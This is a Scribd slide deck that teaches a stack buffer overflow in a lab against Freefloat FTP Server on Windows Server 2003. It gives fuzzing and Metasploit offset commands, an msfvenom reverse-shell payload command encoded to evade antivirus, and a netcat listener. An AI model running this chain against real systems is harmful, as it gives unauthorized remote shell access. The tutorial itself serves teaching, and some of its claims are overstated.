Scribd
Upload
111 views18 pages

Buffer Oveflow

This document discusses how to prepare for and carry out a buffer overflow attack. It explains that buffer overflows occur when more data is sent to a buffer than it can handle, overflowing into adjacent memory. The document outlines the steps to find the offset needed to overwrite the EIP register, use a "jmp esp" instruction to point to the shellcode in the ESP, generate the shellcode, and open a listener to receive the reverse connection after executing the attack. When executed correctly, this allows gaining unauthorized access to the targeted system.

Uploaded by

A
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
111 views18 pages

Buffer Oveflow

This document discusses how to prepare for and carry out a buffer overflow attack. It explains that buffer overflows occur when more data is sent to a buffer than it can handle, overflowing into adjacent memory. The document outlines the steps to find the offset needed to overwrite the EIP register, use a "jmp esp" instruction to point to the shellcode in the ESP, generate the shellcode, and open a listener to receive the reverse connection after executing the attack. When executed correctly, this allows gaining unauthorized access to the targeted system.

Uploaded by

A
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 18

BUFFER

OVERFLO
W
(BOF)
KEY CONCEPTS
• This error occurs when there is more
data in a buffer than it can handle,
causing data to overflow into adjacent
storage.

• This vulnerability can cause a system


crash or, worse, create an entry point for
a cyberattack.

• Secure development practices should


include regular testing to detect and fix
buffer overflows.
BOF DEFENITION
A buffer is a sequential
section of memory
allocated to contain
anything from a character
string to an array of
integers.

A code written in Perl and JavaScript is generally not


susceptible to buffer overflows. However, a buffer overflow
in a program written in C, C++, Fortran or Assembly could
allow the attacker to fully compromise the targeted system.
CPU COMPONENTS

WE WILL FOCUS ON REGISTERS


Registers are storages containing data that are needed so fast and more frequent by the CPU.

Devided into two parts:

Genaral purpose: EAX, EBX, ECX, EDX, EDI, ESP, and EBP. (ESP is the Address for the top of the stack,
EBP is Stack Base Address)

Instruction pointer: EIP (points at the next instruction address).


WE WILL FOCUS ON THE STACK
RAM COMPONENTS
WE WILL FOCUS ON THE STACK
RAM COMPONENTS
The stack The stack with more data The stack (smashed)
Let’s begin
Executing a Buffer Overflow Attack
Cybercriminals exploit buffer overflow problems to
alter the execution path of the application by
overwriting parts of its memory. The malicious extra
data may contain code designed to trigger specific
actions — in effect sending new instructions to the
attacked application that could result in unauthorized
access to the system. Hacker techniques that exploit a
buffer overflow vulnerability vary per architecture
and operating system.
PREPAIRING THE LAB.

Operating Systems Tools & SWs


We will use Kali Linux 2021.3 On kali we will use: nmap, ncat,
and Windows Server 2003 metasploit, Spark-fuzzer and
Wireshark

On Windows Server we will use:


Freefloat FTP server, and
Immunity Debugger
Freefloat FTP Server and Immunity Debugger

This program opens and starts


listening on port 21.

This program is known to be


vulnerable to BOF attack. Immunity debugger shows the
current memory addresses and
Download from here: values.
https://www.exploit-
db.com/apps/687ef6f72dcbbf5b2506e80a375377fa- Registers values can be shown as
freefloatftpserver.zip well.
Download from here:
https://debugger.immunityinc.com/ID_register.py
Immunity Debugger
There are two ways you can load application into immunity debugger.

Second way is to first start application outside


First way is to start the application
debugger and then when its running to attach it to the
directly from the debugger. To do
debugger. To do this click on the File tab and click
this, click on the File tab and click
Attach. You'll see list of running processes you can
Open. Then find your application
attach to the debugger. Select process you wish to
directory, select file and click Open.
debug and click Attach.
Immunity Debugger

Immunity debugger screen is


divided in four parts:

1- Disassembly,

2- Registers,

3- Dump,

4- Stack.
PREPAIRING
&
ATTACKING
PREPAIRING
● Fuzzing is sending random data to the application and monitor for a crash.

● Example, if we execute the following:


line_send_tcp “IP” “PORT” /usr/share/spike/audits/FTPD/ftpd1.spk 0 0
This will send random data to the IP on the PORT, lets assume it stops on payload
“AAAAAA……”
● The results on the target machine are:
● EIP = 0x41414141 (41 is the HEX representation of “A”)
● ESP = AAAAAAAA…….

● Lets learn how we can make use of this:

○ We need to know how many characters caused the overflow, and which four
overwrite the EIP.
PREPAIRING
● How many characters caused the overflow? We can copy the payload “AAAAA…”
and use the following command to count them for us:
echo -e "AAAAAAA….." |wc –c lets assume the result is 513 character
● Now we know how many characters in the payload. We need to check which four
“A”s overwrite the EIP using the following steps:

○ we need to convert the payload into a random non-repeated characters

Using Metasploit: ./pattern_create.rb -l 513 this will create 513 random non-
repeated characters . Result is “Aa0Aa1Aa2……”

○ We execute the attack again using the new characters using: echo –e
“Aa0Aa1Aa2…” | ncat “IP” “port”. Results on targeted machine is EIP =
0x69413269, now we use Metasploit to find the offset of the given value:
./pattern_offset.rb -q 69413269, results is 247.
PREPAIRING
● This means that if we send 247 characters then any four characters (e.g., BBBB), this
will overwrite the EIP with 0x42424242 (42 is the HEX representation of “B”).
● Any extra characters sent after that, will be placed in the ESP.

● How can we use this:


● Theoretically, if were able to overwrite the EIP with a pointer at the ESP, we will be
able to hack into the machine.
● Since the values of registers change frequently, we use Immunity debugger to find a
“jmp esp” instruction in any windows dll file in the victim machine, because dll files
do not change. Once found, we will copy the instruction address to use it instead of
the four “B”s. (Lets assume it is: 77F59BD0 in HEX, so every couple is one
character)
● Now we have a pointer that always points at the ESP.
● All we have to do now is to fill the ESP with our shellcode.
PREPAIRING
● To create the shell code, we will run this command:
● msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST= LPORT= -e
x86/shikata_ga_nai -b "\x00\x0a\x0d" -f c

○ A = architecture
○ Lhost = IP of Kali
○ Lport = any port you wish to assign to the listener
○ P = Payload
○ E = Encoder
○ B = avoid adding the following characters as they may crash
○ F = use the format of the following language (in this case C)
○ windows/shell_reverse_tcp = make the victim initiate the connection
○ shikata_ga_nai = encoder to pypass any antiviruses, IPs, IDs, and firewalls..

● The results is: "\xbd\xb1\xb0\x5a\x82\xdd\........“, we place it after the 77F59BD0.


ATTACKING
● Now we will have to open a listener to listen for any incoming connection at the
assigned port using Metasploit:
netcat -nlvp 443
● The final step is to execute the attack using all the information we gathered and wait..

● Congratulations, you have got an access to the victim machine.

You might also like